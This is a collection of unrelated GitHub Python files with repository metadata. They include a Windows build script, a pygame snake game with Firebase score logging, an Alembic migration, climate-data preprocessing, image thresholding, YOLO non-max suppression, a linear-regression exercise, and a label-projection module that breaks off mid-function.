os.path.join(site.getsitepackages()[1], \"gnome\")\r\nenchant_path = os.path.join(site.getsitepackages()[1], \"enchant\")\r\nfor dll in glob.glob(\"{}\\\\*.dll\".format(gnome_path)):\r\n include_files.append((dll, os.path.basename(dll)))\r\nfor dll in glob.glob(\"{}\\\\*.dll\".format(enchant_path)):\r\n include_files.append((dll, os.path.basename(dll)))\r\nfor lib in (\"etc\", \"lib\", \"share\"):\r\n include_files.append((os.path.join(gnome_path, lib), lib))\r\nfor lib in (\"lib\", \"share\"):\r\n include_files.append((os.path.join(enchant_path, lib), lib))\r\ninclude_files.append((os.path.join(\"build\", \"usr\", \"share\"), \"share\"))\r\n\r\nsetup_kwargs.update(dict(\r\n options=dict(build_exe=dict(compressed=False,\r\n includes=includes,\r\n packages=includes,\r\n include_files=include_files)),\r\n\r\n executables=[cx_Freeze.Executable(script=\"bin/gaupol\",\r\n base=\"Win32GUI\",\r\n icon=\"data/icons/gaupol.ico\")],\r\n\r\n))\r\n\r\nif __name__ == \"__main__\":\r\n cx_Freeze.setup(**setup_kwargs)\r\n","repo_name":"unho/gaupol","sub_path":"winsetup.py","file_name":"winsetup.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"30598975444","text":"import pygame\r\nimport random\r\nimport pyrebase\r\nimport pandas as pd\r\nimport os\r\nfrom datetime import datetime\r\n\r\nnow = datetime.now()\r\ndt_string = now.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n#print(dt_string)\r\ndf = pd.read_excel(\"User_Id.xlsx\",sheet_name=\"User_Email_Id\")\r\nuser_id = df[\"email_id\"][0]\r\nsymbols=['@', '#', '$', '%', '=', ':', '?', '.', '/', '|', '~', '>' , '(', ')', '<',\"!\",\"^\",\"&\",\"_\",\"-\",\"+\",\"=\",\"[\",\"]\",\"{\",\"}\",\"'\",'\"']\r\n\r\nfor i in user_id:\r\n if i in symbols:\r\n user_id = user_id.replace(i,\"\")\r\n user_id = user_id.replace(\"gmailcom\",\"\")\r\n# user_id = game_island.email_value()\r\n#print(\"user_id: \",user_id,\"-->\",type(user_id))\r\n\r\n\r\ntry:\r\n configfirebase = {\"apiKey\": \"AIzaSyDLSXHA_9IKUP2f_FLQF5_F_pZX-2E78cE\",\r\n\"authDomain\": \"game-island-123.firebaseapp.com\",\r\n\"databaseURL\": \"https://game-island-123-default-rtdb.asia-southeast1.firebasedatabase.app\",\r\n\"projectId\": \"game-island-123\",\r\n\"storageBucket\": \"game-island-123.appspot.com\",\r\n\"messagingSenderId\": \"673041816597\",\r\n\"appId\": \"1:673041816597:web:1fa678812282337dcd021c\",\r\n\"measurementId\": \"G-WS0W53GRCN\"\r\n }\r\n firebase = pyrebase.initialize_app(configfirebase)\r\n database = firebase.database()\r\n\r\nexcept:\r\n SyntaxError\r\n\r\npath = \"D:\\Study\\Coding\\RanPlay\\Game_Island\\Slither.xlsx\"\r\npath = os.getcwd() + \"/Slither.xlsx\"\r\nis_file = os.path.isfile(path)\r\nif is_file == True:\r\n pass\r\nelse:\r\n df = pd.DataFrame(columns=[\"Score\"])\r\n df.to_excel(\"Slither.xlsx\",engine=\"openpyxl\",sheet_name=\"User_Data\",index=False)\r\n\r\n\r\ndef win_logout():\r\n path_timer = os.getcwd() + \"/Timer.xlsx\"\r\n os.remove(path_timer)\r\n global user_id\r\n now_logout = datetime.now()\r\n logout_time = now_logout.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n logout_ = logout_time.split()\r\n logout_time = logout_[1]\r\n logout_date = logout_[0]\r\n user_data_island = {\"Status\":'End'}\r\n t_island = repr(str(user_data_island))\r\n import json\r\n user_data_dict_island = json.loads(t_island)\r\n database.child(user_id).child(\"Timings\").child(logout_date).child(\"Slither\").child(logout_time).set(user_data_dict_island)\r\n\r\npygame.init()\r\n# sounds\r\n# pygame.mixer.init()\r\npygame.mixer.music.load(\"slither_audio.mp3\")\r\npygame.mixer.music.set_volume(1)\r\npygame.mixer.music.play(-1)\r\n\r\n\r\n# creating colors\r\nblack = (0,0,0)\r\nred = (255,0,0)\r\nblue = (0,0,255)\r\ngreen = (47,232,143)\r\nviolet = (179,109,255)\r\n\r\n\r\n# Creating pygame windows\r\nscreen_width = 400\r\nscreen_height = 500\r\ngame_window = pygame.display.set_mode((screen_width,screen_height))\r\npygame.display.set_caption(\"Slither\")\r\nicon = pygame.image.load(\"Slither_nobg.png\")\r\npygame.display.set_icon(icon)\r\n\r\n\r\n\r\n# defining functions\r\ndef text_screen(text , color ,x ,y,font_size):\r\n font = pygame.font.SysFont(\"comic sans ms\" , font_size)\r\n screen_text = font.render(text,True,color)\r\n game_window.blit(screen_text,[x,y])\r\n\r\ndef plot_snake(gameWindow,color,snk_list,snake_size):\r\n for x, y in snk_list:\r\n pygame.draw.rect(gameWindow,color,[x,y,snake_size,snake_size])\r\n\r\n# Game loop\r\ndef gameloop():\r\n global user_id\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n #print(dt_string)\r\n # Game specific variables\r\n exit_game = False\r\n game_over = False\r\n snake_size = 10\r\n snake_x = screen_width/2\r\n snake_y = screen_height/2\r\n init_velocity = 10\r\n clock = pygame.time.Clock()\r\n fps = 20\r\n velocity_x = 0\r\n velocity_y = 0\r\n food_x = round(random.randint(20,screen_width-snake_size)/10)*10\r\n food_y = round(random.randint(60,screen_height-snake_size)/10)*10\r\n food_size = snake_size\r\n score = 0\r\n data_count = 0\r\n snk_list = []\r\n snk_length = 1\r\n\r\n while not exit_game:\r\n if game_over == True:\r\n data_count += 1\r\n if data_count == 1:\r\n user_data = {\"Score\":(score*10)}\r\n t = repr(str(user_data))\r\n import json\r\n user_data_dict = json.loads(t)\r\n\r\n user_data = [(score*10)]\r\n df = pd.DataFrame(user_data,columns=[(\"Score\")])\r\n with pd.ExcelWriter(\"Slither.xlsx\",mode=\"a\",engine=\"openpyxl\",if_sheet_exists=\"overlay\") as writer:\r\n df.to_excel(writer, sheet_name=\"User_Data\",header=None,startrow=writer.sheets[\"User_Data\"].max_row,index=False)\r\n database.child(user_id).child(\"Slither\").child(dt_string).set(user_data_dict)\r\n game_window.fill(\"grey\")\r\n text_screen(\"Game over!\",red,100,180,40)\r\n text_screen(f\"Score: {score*10}\",blue,120,235,40)\r\n text_screen(\"Press ENTER to Play again!\",red,15,300,30)\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT :\r\n win_logout()\r\n exit_game = True\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n gameloop()\r\n\r\n if game_over == False:\r\n if abs(snake_x - food_x) < 8 and abs(snake_y - food_y) < 8:\r\n pygame.mixer.music.set_volume(1)\r\n score += 1\r\n # print(\"Score:\",score)\r\n food_x = round(random.randint(20,screen_width-snake_size)/10)*10\r\n food_y = round(random.randint(60,screen_height-snake_size)/10)*10\r\n snk_length += 2\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT :\r\n win_logout()\r\n exit_game = True\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RIGHT:\r\n velocity_x = init_velocity\r\n velocity_y = 0\r\n if event.key == pygame.K_LEFT:\r\n velocity_x = -init_velocity\r\n velocity_y = 0\r\n if event.key == pygame.K_UP:\r\n velocity_x = 0\r\n velocity_y = -init_velocity\r\n if event.key == pygame.K_DOWN:\r\n velocity_x = 0\r\n velocity_y = init_velocity\r\n\r\n game_window.fill(\"grey\")\r\n text_screen(\"Score: \" + str(score*10) , blue , 5 , 2 , 40) \r\n pygame.draw.rect(game_window,red,[food_x,food_y,food_size,food_size])\r\n pygame.draw.line(game_window,black,(0,51),(400,51),width=4)\r\n pygame.draw.line(game_window,black,(0,498),(400,498),width=4)\r\n pygame.draw.line(game_window,black,(1,0),(1,600),width=4)\r\n pygame.draw.line(game_window,black,(397,0),(397,600),width=4)\r\n head = []\r\n head.append(snake_x)\r\n head.append(snake_y)\r\n snk_list.append(head)\r\n # print(snk_length,\"snake length\")\r\n # print(snk_list,\"snake list\")\r\n # print(head,\"head\") \r\n\r\n if len(snk_list) > snk_length :\r\n del snk_list[0]\r\n\r\n if snake_x < 0 or snake_x >= screen_width or snake_y < 60 or snake_y >= screen_height:\r\n game_over = True\r\n \r\n if head in snk_list[:-1]:\r\n game_over = True\r\n # print(snk_list,\"snake list change\")\r\n # print(head,\"head\")\r\n\r\n # pygame.draw.rect(game_window,grey,[snake_x,snake_y,snake_size,snake_size])\r\n plot_snake(game_window,black,snk_list,snake_size)\r\n snake_x += velocity_x\r\n snake_y += velocity_y\r\n\r\n pygame.display.update()\r\n clock.tick(fps)\r\n \r\n\r\n pygame.quit()\r\n quit()\r\n\r\ngameloop()","repo_name":"Game-Island/Game-Island","sub_path":"Codes/slither.py","file_name":"slither.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33665244580","text":"\"\"\"Initial schema (Message)\n\nRevision ID: 17e84c52321f\nRevises:\nCreate Date: 2021-05-22 12:31:43.408142\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '17e84c52321f'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('message',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(length=160), nullable=False),\n sa.Column('views_count', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_message_id'), 'message', ['id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_message_id'), table_name='message')\n op.drop_table('message')\n # ### end Alembic commands ###\n","repo_name":"BartlomiejRasztabiga/evox","sub_path":"alembic/versions/17e84c52321f_initial_schema_message.py","file_name":"17e84c52321f_initial_schema_message.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"4324446099","text":"#Is used to cut ERA-interim data into the thrr hourly values fed into SAMSIM for atmoflux_flag = 2\n#Is mostly there to turn the integrated values given my ERA_interim in to per time units\n#Only works if the ERA-interim data is already sorted into ascci files called precip.grb.txt, lw.grb.txt, sw.grb.txt, and T2m.grb.txt \n\n\nimport numpy as n\n\nprecip = n.loadtxt(\"./precip.grb.txt\")\n\nlenr=len(precip)\n\n\nprecip2 = precip*10000000\nprecip2[0:lenr:4]=precip[0:lenr:4]\nprecip2[1:lenr:4]=precip[1:lenr:4]-precip[0:lenr:4]\nprecip2[2:lenr:4]=precip[2:lenr:4]-precip[1:lenr:4]\nprecip2[3:lenr:4]=precip[3:lenr:4]-precip[2:lenr:4]\nprecip3 = precip2 / (3*3600) /3 \n\n\nsw = n.loadtxt(\"./sw.grb.txt\")\nsw2 = sw*10000000\nsw2[0:lenr:4]=sw[0:lenr:4]\nsw2[1:lenr:4]=sw[1:lenr:4]-sw[0:lenr:4]\nsw2[2:lenr:4]=sw[2:lenr:4]-sw[1:lenr:4]\nsw2[3:lenr:4]=sw[3:lenr:4]-sw[2:lenr:4]\nsw3 = sw2 / (3*3600)\n\nlw = n.loadtxt(\"./lw.grb.txt\")\nlw = lw\nlw2 = lw*10000000\nlw2[0:lenr:4]=lw[0:lenr:4]\nlw2[1:lenr:4]=lw[1:lenr:4]-lw[0:lenr:4]\nlw2[2:lenr:4]=lw[2:lenr:4]-lw[1:lenr:4]\nlw2[3:lenr:4]=lw[3:lenr:4]-lw[2:lenr:4]\n\n\nlw3=lw2/(3*3600)\n\n\n\nT2m = n.loadtxt(\"./T2m.grb.txt\")\nT2m2 = T2m - 273.15\n\n#Add possible shortening here, otherwise leave cut=0\ncut = 8*365/2\n\nT2mf = T2m2[cut:lenr]\nprecipf = precip3[cut:lenr]\nlwf = lw3[cut:lenr]\nswf = sw3[cut:lenr]\n\n\n#OUTPUT\n\nn.savetxt('T2m.txt.input',T2mf)\nn.savetxt('precip.txt.input',precipf)\nn.savetxt('flux_sw.txt.input',swf)\nn.savetxt('flux_lw.txt.input',lwf)\n\n\n","repo_name":"pgriewank/SAMSIM","sub_path":"input/ERA-interim/scripts/pythonscript.py","file_name":"pythonscript.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"34665117575","text":"#----------------------------------------------------\n# Recherche des zones marines par seuillage\n#----------------------------------------------------\n\n\n# PACKAGES\nfrom PIL import Image # On charge Python Image Library\nimport numpy as np # On charge Numpy \nfrom matplotlib import pyplot as plt # On charge pyplot (un sous module de Matplotlib) et on le renomme plt\n\n# TRAITEMENT IMAGE\nim = Image.open('europe.tif') # PIL permet de lire tous les formats d'images\nNx, Ny = im.size # On reduit la definition de l'image\nim = im.resize((Nx/5, Ny/5), Image.ANTIALIAS)\nZ = np.array(im).astype(np.float64) # On convertir l'image en array \nmax_altitude = 1000. # Altitude maximale en metres, cette donnee est un peu douteuse, (a confirmer).\nZ = Z / Z.max() * max_altitude # On recale les altitudes \n\nZ = np.where(Z > 200., 1., 0.) # La fonction np.where permet d'appliquer un test booleen a chaque pixel et de specifier la reponse.\n\n# AFFICHAGE\nplt.figure()\nplt.clf()\nplt.imshow(Z) # Affichage de l'altitude\nplt.colorbar()\nplt.xlabel('$km$') # On specifie le label en x\nplt.ylabel('$km$') # On specifie le label en y\nplt.title('Zones marines') # On specifie le titre\nplt.show() # On affiche l'image\n\n","repo_name":"lcharleux/numerical_analysis","sub_path":"doc/Traitement_images/Example_code/europe_seuillage.py","file_name":"europe_seuillage.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74355146185","text":"\"\"\"\nThe output of YOLO contains probabilities but no discrete object detections.\nThis file helps to look for all detections above a certain threshold.\nIn a next step, non-max-suppression needs to be applied to these detections.\nThe nms algorithm is here, too.\n\"\"\"\nimport numpy as np\nimport tensorflow as tf\n\nfrom utils.prediction import extract_from_blob, get_probabilities\nfrom utils.activations import np_sigmoid, softmax\n\ndef get_detections(predictions, threshold, anchors, out_x, out_y, in_x, in_y, B, C):\n \n predictions = predictions.reshape((-1, out_x, out_y, B, C+5))\n assert predictions.shape[0] == 1, \"this doesn't work on batches\"\n \n predictions = predictions[0] # drop the batch dimension\n \n # get the data out of the predictions\n classes, objectness, probs = get_probabilities(predictions, out_x, out_y, B, C)\n \n # probs is along the B dimension\n # for every cell in the output activation map, get the best bounding box score\n max_probs = probs.max(axis=-1)\n \n thresholded = max_probs > threshold\n # which coordinates are bigger than the threshold ?\n xy = np.where(thresholded)\n \n detections=[]\n # look at all the coordinates found by the thresholding\n for row, col in zip(xy[0], xy[1]):\n\n # for this coordinate, find the box with the highest objectness\n current_probs = objectness[row, col]\n box_idx = np.argmax(current_probs)\n box = predictions[row, col, box_idx]\n\n # get the predicted coordinates, convert them to percent\n # this is the same code as in the generator and the loss function\n # the network learns to predict coordinates encoded in this way\n p_x = (row + np_sigmoid(box[0])) / out_x\n p_y = (col + np_sigmoid(box[1])) / out_y\n p_dx = (np.exp(box[2]) * anchors[box_idx, 0]) / out_x\n p_dy = (np.exp(box[3]) * anchors[box_idx, 1]) / out_y\n\n # resize the predicted coordinates to the input resolution\n min_x = int ((p_x - p_dx/2.) * in_x)\n max_x = int ((p_x + p_dx/2.) * in_x)\n min_y = int ((p_y - p_dy/2.) * in_y)\n max_y = int ((p_y + p_dy/2.) * in_y)\n\n # clip them to the image size\n min_x = max(min_x, 0)\n max_x = min(max_x, in_x)\n min_y = max(min_y, 0)\n max_y = min(max_y, in_y)\n\n # get the highest class prediction\n current_classes = classes[row, col, box_idx]\n label = np.argmax(current_classes)\n\n\n detections.append((label, min_x, max_x, min_y, max_y, current_probs.max()))\n \n return detections\n\ndef apply_nms(detections, session, iou_threshold=0.2):\n # sort the detections\n #create a dictionary that maps labels to detections and their confidence scores\n label_dict={}\n\n for detection in detections:\n\n label, min_x, max_x, min_y, max_y, score = detection\n\n if label in label_dict:\n label_dict[label].append(((min_x, min_y, max_x, max_y), score))\n else:\n label_dict[label] = [((min_x, min_y, max_x, max_y), score)]\n \n # create a new dictionary. Again, it maps labels to detections\n # but the detections are now filtered with non-max suppression\n nms = {}\n\n for label in label_dict:\n boxes = [box for (box, score) in label_dict[label]]\n scores = [score for (box, score) in label_dict[label]]\n\n # tensorflow has a built-in algorithm for non-max suppresion\n # the result is an array of indexes into the list of boxes\n # those indices are the chosen / retained boxes\n # unfortunately, the list is a tensor\n # we need a session to evaluate the tensor\n # at the very top of this notebook we have created this session\n idx = tf.image.non_max_suppression(boxes, scores, 5, iou_threshold=iou_threshold)\n idx = session.run(idx)\n\n # boxes we keep\n boxes = [boxes[i] for i in idx]\n\n nms[label] = boxes\n \n return nms\n \ndef idx_to_name(detections, names):\n # convert a mapping from idx -> value\n # to name -> value\n # by making a lookup in names list\n detections = {names[key]: value for key,value in detections.items()}\n \n return detections","repo_name":"lhk/object_detection","sub_path":"yolov2/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"18466193125","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# # 2 单变量的线性回归\n# 整个2的部分需要根据城市人口数量,预测开小吃店的利润\n# 数据在ex1data1.txt里,第一列是城市人口数量,第二列是该城市小吃店利润。\n\n# ## 2.1 Plotting the Data\n# 读入数据,然后展示数据\npath = 'ex1data1.txt'\ndata = pd.read_csv(path, header=None, names=['Population', 'Profit'])\nprint(data.head())\ndata.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))\nplt.show()\n\n# ## 2.2 梯度下降\n# 这个部分你需要在现有数据集上,训练线性回归的参数θ\ndef computeCost(X, y, theta):\n inner = np.power(((X * theta.T) - y), 2)\n return np.sum(inner) / (2 * len(X))\n\n# ### 2.2.2实现\n# 数据前面已经读取完毕,我们要为加入一列x,用于更新θ(0),然后我们将θ初始化为0,学习率初始化为0.01,迭代次数为1500次\n\ndata.insert(0, 'Ones', 1) #在第0列插入1,列名为’Ones’\n# 现在我们来做一些变量初始化。\n# 初始化X和y\ncols = data.shape[1] #cols=3\nX = data.iloc[:,:-1]#X是data里的除最后列\ny = data.iloc[:,cols-1:cols]#y是data最后一列\n\n# 代价函数是应该是numpy矩阵,所以我们需要转换X和Y,然后才能使用它们。 我们还需要初始化theta。\nX = np.matrix(X.values)\ny = np.matrix(y.values)\ntheta = np.matrix(np.array([0,0]))\nprint(X.shape, theta.shape, y.shape)# 看下维度\n\n# ### 2.2.3计算J(θ) #这个部分计算J(Ѳ),X是矩阵\nprint(computeCost(X, y, theta)) # 计算代价函数 (theta初始值为0),答案应该是32.07\n# ### 2.2.4 梯度下降\n# 记住J(θ)的变量是θ,而不是X和y,意思是说,我们变化θ的值来使J(θ)变化,而不是变化X和y的值。\n# 一个检查梯度下降是不是在正常运作的方式,是打印出每一步J(θ)的值,看他是不是一直都在减小,并且最后收敛至一个稳定的值。\n# θ最后的结果会用来预测小吃店在35000及70000人城市规模的利润。\n\ndef gradientDescent(X, y, theta, alpha, iters):\n temp = np.matrix(np.zeros(theta.shape)) #[0. 0.]\n parameters = int(theta.ravel().shape[1]) #需要更新的参数 2 .ravel()扁平化\n cost = np.zeros(iters)\n for i in range(iters):\n error = (X * theta.T) - y\n for j in range(parameters):\n term = np.multiply(error, X[:, j]) # np.multiply 数组对应元素位置相乘\n temp[0, j] = theta[0, j] - ((alpha / len(X)) * np.sum(term))\n theta = temp\n cost[i] = computeCost(X, y, theta)\n return theta, cost\n\n# 这个部分实现了Ѳ的更新\nalpha = 0.01 # 初始化一些附加变量 - 学习速率α和要执行的迭代次数,2.2.2中已经提到。\niters = 1500\n\n# 现在让我们运行梯度下降算法来将我们的参数θ适合于训练集。\ng, cost = gradientDescent(X, y, theta, alpha, iters) #g为训练得的模型参数\nprint(g,cost)\npredict1 = [1, 3.5] * g.T\nprint(\"predict1:\", predict1)\npredict2 = [1, 7] * g.T\nprint(\"predict2:\", predict2)\n# 预测35000和70000城市规模的小吃摊利润\nx = np.linspace(data.Population.min(), data.Population.max(), 100) #x轴指定区间取100个等间距点\nf = g[0, 0] + (g[0, 1] * x) #g=[[-3.63029144 1.16636235]] f为100个x的预测结果\nfig, ax = plt.subplots(figsize=(12, 8))\nax.plot(x, f, 'r', label='Prediction') #画线\nax.scatter(data.Population, data.Profit, label='Traning Data') #画点\nax.legend(loc=2)\nax.set_xlabel('Population')\nax.set_ylabel('Profit')\nax.set_title('Predicted Profit vs. Population Size')\nplt.show()\n# 显示原始数据以及拟合的直线\n\n\n\n\n# # 3 多变量线性回归\n# ex1data2.txt里的数据,第一列是房屋大小,第二列是卧室数量,第三列是房屋售价\n# 根据已有数据,建立模型,预测房屋的售价\npath = 'ex1data2.txt'\ndata2 = pd.read_csv(path, header=None, names=['Size', 'Bedrooms', 'Price'])\nprint(data2.head())\n\n# ## 3.1 特征归一化\n# 观察数据发现,size变量是bedrooms变量的1000倍大小,统一量级会让梯度下降收敛的更快。做法就是,将每类特征减去他的平均值后除以标准差\ndata2 = (data2 - data2.mean()) / data2.std()\nprint(data2.head())\n\n# ## 3.2 梯度下降\n# 加一列常数项\ndata2.insert(0, 'Ones', 1)\n\n# 初始化X和y\ncols = data2.shape[1]\nX2 = data2.iloc[:, 0:cols - 1]\ny2 = data2.iloc[:, cols - 1:cols]\n\n# 转换成matrix格式,初始化theta\nX2 = np.matrix(X2.values)\ny2 = np.matrix(y2.values)\ntheta2 = np.matrix(np.array([0, 0, 0]))\n\n# 运行梯度下降算法\ng2, cost2 = gradientDescent(X2, y2, theta2, alpha, iters)\nprint(g2)\n\n\n# ## 3.3 正规方程\n# 正规方程是通过求解下面的方程来找出使得代价函数最小的参数的:$\\frac{\\partial }{\\partial {{\\theta }_{j}}}J\\left( {{\\theta }_{j}} \\right)=0$ 。\n# 假设我们的训练集特征矩阵为 X(包含了${{x}_{0}}=1$)并且我们的训练集结果为向量 y,则利用正规方程解出向量 $\\theta ={{\\left( {{X}^{T}}X \\right)}^{-1}}{{X}^{T}}y$ 。\n# 上标T代表矩阵转置,上标-1 代表矩阵的逆。设矩阵$A={{X}^{T}}X$,则:${{\\left( {{X}^{T}}X \\right)}^{-1}}={{A}^{-1}}$\n#\n# 梯度下降与正规方程的比较:\n#\n# 梯度下降:需要选择学习率α,需要多次迭代,当特征数量n大时也能较好适用,适用于各种类型的模型\n# 正规方程:不需要选择学习率α,一次计算得出,需要计算${{\\left( {{X}^{T}}X \\right)}^{-1}}$,如果特征数量n较大则运算代价大,\n# 因为矩阵逆的计算时间复杂度为$O(n3)$,通常来说当$n$小于10000 时还是可以接��的,只适用于线性模型,不适合逻辑回归模型等其他模型\n\n# 正规方程\ndef normalEqn(X, y):\n theta = np.linalg.inv(X.T @ X) @ X.T @ y # X.T@X等价于X.T.dot(X)\n return theta\nfinal_theta2 = normalEqn(X, y) # 这里用的是data1的数据\nprint(final_theta2)\n# 梯度下降得到的结果是matrix([[-3.24140214, 1.1272942 ]])","repo_name":"chenmeilong/SRai","sub_path":"machine_learning/WuEnDa_class/1.线性回归/numpy裸写线性回归.py","file_name":"numpy裸写线性回归.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"38483231035","text":"import multiprocessing\nimport os\nfrom typing import List, Dict\nfrom projection.dataset import ProjectionDataloader\nimport math\nfrom tqdm.auto import tqdm\nimport string\nfrom functools import partial\n\npuncs = set(string.punctuation)\n\n\ndef batch(iterable, n=1) -> iter:\n\n l: int = len(iterable)\n p: int = math.ceil(l / n)\n for ndx in range(0, l, p):\n yield iterable[ndx : min(ndx + p, l)]\n\n\ndef sentence_projection(\n source_words: List[str],\n source_tags_type: List[str],\n source_tags_ids: List[List[int]],\n target_words: List[str],\n alignments: Dict,\n remove_puncs: bool = True, # If a source word is aligned to a punctuation mark, we remove the alignment.\n # Use True if you are projection named entities or labels with a small number of words.\n # Use false for argumentation datasets and datasets in which the labels are long sentences.\n fill_gap_size: int = 1, # If the projected label is split in two or more parts, we fill the gap if the gap size is\n # less or equal than fill_gap_size. Else we will choose the largest label and remove the other part.\n # Use True 1 if you are projection named entities or labels with a small number of words.\n # Use a larger value for argumentation datasets and datasets in which the labels are long sentences.\n) -> List[str]:\n\n assert len(source_tags_type) == len(source_tags_ids)\n\n if len(target_words) == 0 or len(source_words) == 0:\n print(\n f\"Warning, empty sentence found. source_words: {source_words}. target_words: {target_words}\"\n )\n return [\"O\"] * len(target_words)\n\n # GET TARGET TAGS IDS\n\n target_tags_ids: List[List[int]] = []\n target_tags_types: List[str] = []\n\n for source_tag_ids, source_tag_type in zip(source_tags_ids, source_tags_type):\n target_tag = []\n for tag_id in source_tag_ids:\n try:\n target_tag.extend(alignments[tag_id])\n except KeyError:\n continue\n\n target_tag = sorted(\n list(set(target_tag))\n ) # ENSURE NO DUPLICATED VALUES AND SORT\n\n if target_tag:\n target_tags_ids.append(target_tag)\n target_tags_types.append(source_tag_type)\n\n # REMOVE TAGS THAT ARE PUNCTUATION\n if remove_puncs:\n for target_tag_idx in range(len(target_tags_ids) - 1, -1, -1):\n target_tags_c = target_tags_ids[target_tag_idx].copy()\n for tag_idx in range(len(target_tags_ids[target_tag_idx]) - 1, -1, -1):\n try:\n tword = target_words[\n target_tags_ids[target_tag_idx][tag_idx]\n ].strip()\n except IndexError:\n raise IndexError(\n f\"\\ntarget_tags_ids: {target_tags_ids}\\n\"\n f\"target_tags_c: {target_tags_c}\\n\"\n f\"target_tags_ids[target_tag_idx]: {target_tags_ids[target_tag_idx]}\\n\"\n f\"tag_idx: {tag_idx}\\n\"\n f\"target_tag_idx:{target_tag_idx}\\n\"\n f\"source_words: {source_words}\\n\"\n f\"target_words: {target_words}\\n\"\n )\n if all([char in puncs for char in tword]):\n # print(f\"Warning: Removing word: {tword} from projected tag. \")\n del target_tags_ids[target_tag_idx][tag_idx]\n\n if len(target_tags_ids[target_tag_idx]) == 0:\n del target_tags_ids[target_tag_idx]\n del target_tags_types[target_tag_idx]\n # print(f\"Warning: Removing tag: {[target_words[i] for i in target_tags_c]}\")\n\n # FIX DISCONTINUOUS SPANS\n\n for target_tag_no, target_tag_ids in enumerate(target_tags_ids):\n\n # SPLIT IN GROUPS\n\n groups: List[List[int]] = [[target_tag_ids[0]]]\n for tag_id in target_tag_ids[1:]:\n if tag_id != groups[-1][-1] + 1:\n groups.append([tag_id])\n else:\n groups[-1].append(tag_id)\n\n # MERGE GROUPS WITH GAP = 1\n\n i = 0\n while i < len(groups) - 1:\n if groups[i + 1][-1] - groups[i][0] <= (fill_gap_size + 1):\n\n groups[i] = (\n groups[i]\n + list(range(groups[i][-1] + 1, groups[i + 1][0]))\n + groups[i + 1]\n )\n del groups[i + 1]\n else:\n i += 1\n\n # GET LARGEST GROUP\n\n target_tags_ids[target_tag_no] = max(groups, key=len)\n\n # FIX COLLISIONS\n # MERGE SAME TYPE TAGS\n\n i = 0\n while i < len(target_tags_ids) - 1:\n if target_tags_ids[i][-1] >= target_tags_ids[i + 1][0]:\n\n if target_tags_types[i] == target_tags_types[i + 1]:\n target_tags_ids[i] = sorted(\n list(set(target_tags_ids[i] + target_tags_ids[i + 1]))\n )\n\n del target_tags_ids[i + 1]\n del target_tags_types[i + 1]\n\n else:\n i += 1\n else:\n i += 1\n\n # GET LARGEST TAG IF COLLISION\n i = 0\n while i < len(target_tags_ids) - 1:\n if target_tags_ids[i][-1] >= target_tags_ids[i + 1][0]:\n if len(target_tags_ids[i]) > len(target_tags_ids[i + 1]):\n del target_tags_types[i + 1]\n del target_tags_ids[i + 1]\n else:\n del target_tags_types[i]\n del target_tags_ids[i]\n\n else:\n i += 1\n\n # WRITE TAGS\n\n target_tags: List[str] = [\"O\"] * len(target_words)\n\n for tag_ids, tag_type in zip(target_tags_ids, target_tags_types):\n try:\n if tag_ids:\n target_tags[tag_ids[0]] = f\"B-{tag_type}\"\n for tag_id in tag_ids[1:]:\n target_tags[tag_id] = f\"I-{tag_type}\"\n except IndexError:\n print(f\"target_tags: {target_tags}. tag_id:{tag_ids}\")\n print(f\"Source words: {source_words}\")\n print(f\"Source tags: {source_tags_ids}\")\n print(f\"target_words: {target_words}.\")\n print(f\"alignments: {alignments}\")\n print(\"=================================\")\n raise\n\n return target_tags\n\n\ndef sentences_projection(\n sources_words: List[List[str]],\n sources_tags_type: List[List[str]],\n sources_tags_ids: List[List[List[int]]],\n target_words: List[List[str]],\n alignments: List[Dict],\n remove_puncs: bool = True,\n fill_gap_size: int = 1,\n) -> str:\n\n assert (\n len(sources_words)\n == len(sources_tags_type)\n == len(sources_tags_ids)\n == len(target_words)\n == len(alignments)\n ), (\n f\"len(sources_words): {len(sources_words)}. \"\n f\"len(sources_tags_type): {len(sources_tags_type)}. \"\n f\"len(sources_tags_ids): {len(sources_tags_ids)}. \"\n f\"len(target_words): {len(target_words)}. \"\n f\"len(alignments): {len(alignments)}. \\n\"\n f\"sources_words: {sources_words}. \"\n f\"sources_tags_ids: {sources_tags_ids}. \"\n f\"target_words: {target_words}. \"\n f\"alignments: {alignments}.\"\n )\n\n output: List[str] = []\n\n for (\n source_words,\n source_tags_type,\n source_tags_ids,\n target_words,\n alignments,\n ) in zip(\n sources_words, 